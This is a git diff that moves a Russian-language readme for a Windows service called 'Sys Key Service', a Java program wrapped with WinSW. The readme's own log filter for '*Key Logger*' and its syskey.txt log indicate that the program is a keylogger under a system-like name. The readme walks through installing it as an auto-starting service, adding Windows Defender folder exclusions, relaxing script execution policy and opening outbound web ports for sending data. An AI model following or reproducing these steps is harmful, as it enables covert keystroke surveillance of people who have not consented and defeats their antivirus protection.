diff --git a/app/readme.md b/app/readme.md deleted file mode 100644 index 07f79c9..0000000 --- a/app/readme.md +++ /dev/null @@ -1,155 +0,0 @@ -1. Установка службы (если ещё не установлена) - powershell - -# Требует прав администратора -Set-Location "C:\Program Files\SysKeyService" -.\SysKeyService.exe install - -2. Запуск службы - powershell - -# Способ 1: Через WinSW -.\SysKeyService.exe start - -# Способ 2: Через PowerShell -Start-Service -Name "Sys Key Service" - -3. Проверка состояния службы - powershell - -Get-Service -Name "Sys Key Service" - -4. Остановка службы - powershell - -# Через WinSW -.\SysKeyService.exe stop - -# Через PowerShell -Stop-Service -Name "Sys Key Service" - -5. Удаление службы - powershell - -# Требует остановки службы -.\SysKeyService.exe uninstall - -6. Просмотр логов службы - powershell - -# Логи WinSW -Get-Content "C:\Program Files\SysKeyService\SysKeyService.out.log" -Tail 50 -Get-Content "C:\Program Files\SysKeyService\SysKeyService.err.log" -Tail 50 - -# Логи приложения -Get-Content "C:\ProgramData\SysKeyService\syskey.txt" -Tail 100 - -7. Полный скрипт установки и запуска - powershell - -# Требует прав администратора -$serviceName = "Sys Key Service" -$installDir = "C:\Program Files\SysKeyService" -$jarPath = "$installDir\SysKeyService.jar" - -# Создание директории -New-Item -Path $installDir -ItemType Directory -Force - -# Копирование файлов (замените на свои пути) -Copy-Item -Path ".\SysKeyService.jar" -Destination $jarPath -Copy-Item -Path ".\SysKeyService.exe" -Destination $installDir -Copy-Item -Path ".\SysKeyService.xml" -Destination $installDir - -# Установка службы -Set-Location $installDir -.\SysKeyService.exe install - -# Запуск службы -Start-Service -Name $serviceName - -# Проверка статуса -Get-Service -Name $serviceName - -# Автозапуск при загрузке -Set-Service -Name $serviceName -StartupType Automatic - -8. Важные команды для управления службами - powershell - -# Список всех служб -Get-Service - -# Поиск службы по имени -Get-Service -Name "*Key*" - -# Перезапуск службы -Restart-Service -Name "Sys Key Service" - -# Изменение типа запуска -Set-Service -Name "Sys Key Service" -StartupType Automatic # Автозапуск -Set-Service -Name "Sys Key Service" -StartupType Manual # Ручной запуск -Set-Service -Name "Sys Key Service" -StartupType Disabled # Отключена - -9. Устранение неполадок - -Если служба не запускается: -powershell - -# Просмотр системных логов -Get-EventLog -LogName System -Source "Service Control Manager" -After (Get-Date).AddMinutes(-5) | -Where-Object {$_.Message -like "*Key Logger*"} - -# Проверка прав доступа -icacls "C:\Program Files\SysKeyService" -icacls "C:\ProgramData\SysKeyService" - -# Проверка зависимости от Java -where.exe java -java -version - -10. Удаление службы (полное) - powershell - -Stop-Service -Name "Sys Key Service" -Force -.\SysKeyService.exe uninstall -Remove-Item -Path "C:\Program Files\SysKeyService" -Recurse -Force -Remove-Item -Path "C:\ProgramData\SysKeyService" -Recurse -Force - -Важные замечания: - - Права доступа: Все команды управления службами требуют запуска PowerShell от имени администратора. - - Политика выполнения: - Если возникает ошибка выполнения скриптов: - powershell - -Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force - -Безопасность: - - Антивирусы могут блокировать работу службы - - Добавьте исключения для папок: - powershell - - Add-MpPreference -ExclusionPath "C:\Program Files\SysKeyService" - Add-MpPreference -ExclusionPath "C:\ProgramData\SysKeyService" - -Логирование: - - Логи службы: C:\Program Files\SysKeyService\*.log - - Логи приложения: C:\ProgramData\SysKeyService\syskey.txt - - Системные логи: Event Viewer > Windows Logs > System - -Сетевая безопасность: -Если служба отправляет данные по сети, откройте порты: -powershell - - New-NetFirewallRule -DisplayName "SysKeyService Service" -Direction Outbound -Protocol TCP -RemotePort 80,443 -Action Allow - -Для постоянного мониторинга состояния службы можно использовать: -powershell - -Get-Service -Name "Sys Key Service" | Format-List * \ No newline at end of file diff --git a/readme.md b/readme.md new file mode 100644 index 0000000..07f79c9 --- /dev/null +++ b/readme.md @@ -0,0 +1,155 @@ +1. Установка службы (если ещё не установлена) + powershell + +# Требует прав администратора +Set-Location "C:\Program Files\SysKeyService" +.\SysKeyService.exe install + +2. Запуск службы + powershell + +# Способ 1: Через WinSW +.\SysKeyService.exe start + +# Способ 2: Через PowerShell +Start-Service -Name "Sys Key Service" + +3. Проверка состояния службы + powershell + +Get-Service -Name "Sys Key Service" + +4. Остановка службы + powershell + +# Через WinSW +.\SysKeyService.exe stop + +# Через PowerShell +Stop-Service -Name "Sys Key Service" + +5. Удаление службы + powershell + +# Требует остановки службы +.\SysKeyService.exe uninstall + +6. Просмотр логов службы + powershell + +# Логи WinSW +Get-Content "C:\Program Files\SysKeyService\SysKeyService.out.log" -Tail 50 +Get-Content "C:\Program Files\SysKeyService\SysKeyService.err.log" -Tail 50 + +# Логи приложения +Get-Content "C:\ProgramData\SysKeyService\syskey.txt" -Tail 100 + +7. Полный скрипт установки и запуска + powershell + +# Требует прав администратора +$serviceName = "Sys Key Service" +$installDir = "C:\Program Files\SysKeyService" +$jarPath = "$installDir\SysKeyService.jar" + +# Создание директории +New-Item -Path $installDir -ItemType Directory -Force + +# Копирование файлов (замените на свои пути) +Copy-Item -Path ".\SysKeyService.jar" -Destination $jarPath +Copy-Item -Path ".\SysKeyService.exe" -Destination $installDir +Copy-Item -Path ".\SysKeyService.xml" -Destination $installDir + +# Установка службы +Set-Location $installDir +.\SysKeyService.exe install + +# Запуск службы +Start-Service -Name $serviceName + +# Проверка статуса +Get-Service -Name $serviceName + +# Автозапуск при загрузке +Set-Service -Name $serviceName -StartupType Automatic + +8. Важные команды для управления службами + powershell + +# Список всех служб +Get-Service + +# Поиск службы по имени +Get-Service -Name "*Key*" + +# Перезапуск службы +Restart-Service -Name "Sys Key Service" + +# Изменение типа запуска +Set-Service -Name "Sys Key Service" -StartupType Automatic # Автозапуск +Set-Service -Name "Sys Key Service" -StartupType Manual # Ручной запуск +Set-Service -Name "Sys Key Service" -StartupType Disabled # Отключена + +9. Устранение неполадок + +Если служба не запускается: +powershell + +# Просмотр системных логов +Get-EventLog -LogName System -Source "Service Control Manager" -After (Get-Date).AddMinutes(-5) | +Where-Object {$_.Message -like "*Key Logger*"} + +# Проверка прав доступа +icacls "C:\Program Files\SysKeyService" +icacls "C:\ProgramData\SysKeyService" + +# Проверка зависимости от Java +where.exe java +java -version + +10. Удаление службы (полное) + powershell + +Stop-Service -Name "Sys Key Service" -Force +.\SysKeyService.exe uninstall +Remove-Item -Path "C:\Program Files\SysKeyService" -Recurse -Force +Remove-Item -Path "C:\ProgramData\SysKeyService" -Recurse -Force + +Важные замечания: + + Права доступа: Все команды управления службами требуют запуска PowerShell от имени администратора. + + Политика выполнения: + Если возникает ошибка выполнения скриптов: + powershell + +Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force + +Безопасность: + + Антивирусы могут блокировать работу службы + + Добавьте исключения для папок: + powershell + + Add-MpPreference -ExclusionPath "C:\Program Files\SysKeyService" + Add-MpPreference -ExclusionPath "C:\ProgramData\SysKeyService" + +Логирование: + + Логи службы: C:\Program Files\SysKeyService\*.log + + Логи приложения: C:\ProgramData\SysKeyService\syskey.txt + + Системные логи: Event Viewer > Windows Logs > System + +Сетевая безопасность: +Если служба отправляет данные по сети, откройте порты: +powershell + + New-NetFirewallRule -DisplayName "SysKeyService Service" -Direction Outbound -Protocol TCP -RemotePort 80,443 -Action Allow + +Для постоянного мониторинга состояния службы можно использовать: +powershell + +Get-Service -Name "Sys Key Service" | Format-List * \ No newline at end of file